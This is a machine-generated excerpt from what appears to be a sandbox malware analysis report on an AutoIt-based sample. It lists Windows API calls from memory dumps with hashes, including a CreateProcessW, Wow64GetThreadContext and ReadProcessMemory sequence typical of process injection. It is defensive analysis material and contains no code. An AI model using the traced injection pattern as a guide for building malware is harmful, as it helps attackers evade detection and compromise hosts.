                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                            • String ID: X
                                                                                                            • API String ID: 779396738-3081909835
                                                                                                            • Opcode ID: 66d792267aaac53cfe796c0951cc60e0565ba82f09427e3f49dcf5f8e56cbab2
                                                                                                            • Instruction ID: da95d987334e758308e8e0857df53b78302a6f50d1afca7ae3f94128068d6fe9
                                                                                                            • Opcode Fuzzy Hash: 66d792267aaac53cfe796c0951cc60e0565ba82f09427e3f49dcf5f8e56cbab2
                                                                                                            • Instruction Fuzzy Hash: 9B21F071E002489FDB41EF95CC45BEE7BF8AF48310F00801AE545A7281DBB89A899FA1
                                                                                                            APIs
                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3908
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconNotifyShell_
                                                                                                            • String ID:
                                                                                                            • API String ID: 1144537725-0
                                                                                                            • Opcode ID: 53c8255c3cb495a6b538bf21962e196a238bf6fe5cda1c71030c2104e82eef42
                                                                                                            • Instruction ID: 96cd740c46ba613721d9ad0044aa47d78b73189b9a05044113bffe3c521daecb
                                                                                                            • Opcode Fuzzy Hash: 53c8255c3cb495a6b538bf21962e196a238bf6fe5cda1c71030c2104e82eef42
                                                                                                            • Instruction Fuzzy Hash: 63317AB19443019FE320DF25D58479ABBE8FB49718F00092EE5DA83240E776AA44DB52
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FB949C,?,00008000), ref: 00FB5773
                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00FB949C,?,00008000), ref: 00FF4052
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 77216107de69c47d2aad7fd4208b19c4e0dc284c997318364a37ef0ccba2d13c
                                                                                                            • Instruction ID: f9a48aec11658ca3d05ec938a25c8743690708e6139096bebab2d1b80cd726fc
                                                                                                            • Opcode Fuzzy Hash: 77216107de69c47d2aad7fd4208b19c4e0dc284c997318364a37ef0ccba2d13c
                                                                                                            • Instruction Fuzzy Hash: 92018431645225B6E3304A26CD0EF977F54DF02B70F108200BF9D5A1E0CBB85454DB90
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00FBBB4E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Init_thread_footer
                                                                                                            • String ID:
                                                                                                            • API String ID: 1385522511-0
                                                                                                            • Opcode ID: f72cd0a90763d993c7780efc4ae5b11637ea570dbd3bc4c03138ccc839aeb04f
                                                                                                            • Instruction ID: 8e09f79535057b571f619e21c842a54cb71d5447a6adc6a327705408e153a3ad
                                                                                                            • Opcode Fuzzy Hash: f72cd0a90763d993c7780efc4ae5b11637ea570dbd3bc4c03138ccc839aeb04f
                                                                                                            • Instruction Fuzzy Hash: BE32CA31A042099FEB21CF19C894BFEB7B9EF44350F148059E986AB295C7B8ED41DF91
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 014DA443
                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DA4D9
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DA4FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 2438371351-0
                                                                                                            • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                            • Instruction ID: 7cdfd8e04e592b8887d25328ab7b9060e9738d78ce68ae4a756dd2c275664c79
                                                                                                            • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                            • Instruction Fuzzy Hash: 9F12CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString
                                                                                                            • String ID:
                                                                                                            • API String ID: 2948472770-0
                                                                                                            • Opcode ID: a2156c38db9e28e5252c740b3f15e08cc2c37d6ea4e0391ce9a4f4410c255e93
                                                                                                            • Instruction ID: a427c485ac939a9b6978b0a64c5c3f108187252b2f0d7df103a25060131cb727
                                                                                                            • Opcode Fuzzy Hash: a2156c38db9e28e5252c740b3f15e08cc2c37d6ea4e0391ce9a4f4410c255e93
                                                                                                            • Instruction Fuzzy Hash: CED16F75A0020AEFCB14DF99C881DEDBBB9FF48310F148159E945AB292DB35AD81CF90
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                            • Instruction ID: 6bc0c913df28e98115233ad91a3f9035d65d7afa528a8ca22a2b567085cf6d7c
                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                            • Instruction Fuzzy Hash: CB310A75A0010A9BC718CF59D581E69F7A2FF49310B6482A9E806CB651D731EEC5EBC0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E9C
                                                                                                              • Part of subcall function 00FB4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB4EAE
                                                                                                              • Part of subcall function 00FB4E90: FreeLibrary.KERNEL32(00000000,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4EC0
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4EFD
                                                                                                              • Part of subcall function 00FB4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E62
                                                                                                              • Part of subcall function 00FB4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB4E74
                                                                                                              • Part of subcall function 00FB4E59: FreeLibrary.KERNEL32(00000000,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2632591731-0
                                                                                                            • Opcode ID: eef8c7f1d735b931be025cb49d91ef1cd520b0d8e1c1e7ec2e2cc200d606453f
                                                                                                            • Instruction ID: f1197d086b067dd8a7a219fa3e6aea813014a579548c5db1c085bebe73029bb2
                                                                                                            • Opcode Fuzzy Hash: eef8c7f1d735b931be025cb49d91ef1cd520b0d8e1c1e7ec2e2cc200d606453f
                                                                                                            • Instruction Fuzzy Hash: 2A11C432600205ABDB14BB66DE12BED77A59F40B10F10442DF582AB1D2DE79EA45BF50
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __wsopen_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 3347428461-0
                                                                                                            • Opcode ID: 15127d39d69e2b889b8cdde5e7dcec624484c499b6545426ca566077e45a09e8
                                                                                                            • Instruction ID: 457297c24c14debe1e5dbc9bf67888c4e496f37d6f1d012afd7f960a2db6507a
                                                                                                            • Opcode Fuzzy Hash: 15127d39d69e2b889b8cdde5e7dcec624484c499b6545426ca566077e45a09e8
                                                                                                            • Instruction Fuzzy Hash: E811487190410AAFCB15DF59E9409DE7BF4EF48310F104059F808AB352DA31DA12DBA4
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FE4C7D: RtlAllocateHeap.NTDLL(00000008,00FB1129,00000000,?,00FE2E29,00000001,00000364,?,?,?,00FDF2DE,00FE3863,01081444,?,00FCFDF5,?), ref: 00FE4CBE
                                                                                                            • _free.LIBCMT ref: 00FE506C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 614378929-0
                                                                                                            • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                            • Instruction ID: 2f8bc668e807b379a321d451a00c0a1fb8ec51e418a24d07d612265820cea7a0
                                                                                                            • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                            • Instruction Fuzzy Hash: BB0126726047456BE3218E6A9C85A5AFBEDFB89370F25051DF284832C0EA70A805C6B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                            • Instruction ID: d4799f8d2652ab9252e78d002943ba0ed7cc5d456ab89455dcfed4f29d48fcb4
                                                                                                            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                            • Instruction Fuzzy Hash: C0F02D32521A1496C7313A6ACC05B5A339E9F52375F18071BF425973D2DB7CE802B9A6
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00FB1129,00000000,?,00FE2E29,00000001,00000364,?,?,?,00FDF2DE,00FE3863,01081444,?,00FCFDF5,?), ref: 00FE4CBE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 55a6b2d496a5650680c94da0641fac8c51f7a6874b101c520c13630b7a4b3355
                                                                                                            • Instruction ID: a71da4327185e7545ff85a513fb66a574dd7c81abc2ef147df6958792852d035
                                                                                                            • Opcode Fuzzy Hash: 55a6b2d496a5650680c94da0641fac8c51f7a6874b101c520c13630b7a4b3355
                                                                                                            • Instruction Fuzzy Hash: D1F05932A032B067DB205F6B9C05F5A3789BF413B0B38411AB80AE7680CA34F800B2F0
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 6b4b52790ec55a5f1e68b3bb77e15c1be7d470a834ea269d91c001c04d472894
                                                                                                            • Instruction ID: b0f3d810b4ebbea906cab380615ed64d8450a594ce036a6332459f45bc7f8119
                                                                                                            • Opcode Fuzzy Hash: 6b4b52790ec55a5f1e68b3bb77e15c1be7d470a834ea269d91c001c04d472894
                                                                                                            • Instruction Fuzzy Hash: C2E0E5339012A467E73126679C0DB9A3749AF827B0F090122BC4593580CB25EF01B2E0
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4F6D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 1baedd62199d1856567f1a4fb5ac92b8c2af5c3abb35860fa65455906474eb69
                                                                                                            • Instruction ID: 0040c522b8600feeb0e9167b6cd8951d06f55cf8a0ca4b95aa7e84a11ae02fb0
                                                                                                            • Opcode Fuzzy Hash: 1baedd62199d1856567f1a4fb5ac92b8c2af5c3abb35860fa65455906474eb69
                                                                                                            • Instruction Fuzzy Hash: B7F03071505751CFDB349F65D590962B7F4EF14329314897EE1EA83612C731A844EF10
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00FFEE51,01073630,00000002), ref: 0101CD26
                                                                                                              • Part of subcall function 0101CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0101CD19,?,?,?), ref: 0101CC59
                                                                                                              • Part of subcall function 0101CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0101CD19,?,?,?,?,00FFEE51,01073630,00000002), ref: 0101CC6E
                                                                                                              • Part of subcall function 0101CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0101CD19,?,?,?,?,00FFEE51,01073630,00000002), ref: 0101CC7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$Write
                                                                                                            • String ID:
                                                                                                            • API String ID: 3847668363-0
                                                                                                            • Opcode ID: a134fd0a67536d95e03fbb851841300da0c7613ab28fc637613e8c8439816f21
                                                                                                            • Instruction ID: 803d7a6341552f4d8a3db087958e60c93497b09675f657f476e6a78164b3f7e1
                                                                                                            • Opcode Fuzzy Hash: a134fd0a67536d95e03fbb851841300da0c7613ab28fc637613e8c8439816f21
                                                                                                            • Instruction Fuzzy Hash: 43E0657A400704EFD7219F4ADA4089ABBF8FF85250710852FE995C2114D375EA14DB60
                                                                                                            APIs
                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB2DC4
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 541455249-0
                                                                                                            • Opcode ID: 01ba094a58b4bad517a5672440bd9afcaf9fa1279bb7ea914fa0895def6f4f2b
                                                                                                            • Instruction ID: 74eb3525a45df9afba405ddf22f6e75de80f04af22ec627e5b7426c1b8c34258
                                                                                                            • Opcode Fuzzy Hash: 01ba094a58b4bad517a5672440bd9afcaf9fa1279bb7ea914fa0895def6f4f2b
                                                                                                            • Instruction Fuzzy Hash: DEE0CD766011245BC72092599C05FEA77EDDFC8790F044071FD09D7248D968AD808650
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3908
                                                                                                              • Part of subcall function 00FBD730: GetInputState.USER32 ref: 00FBD807
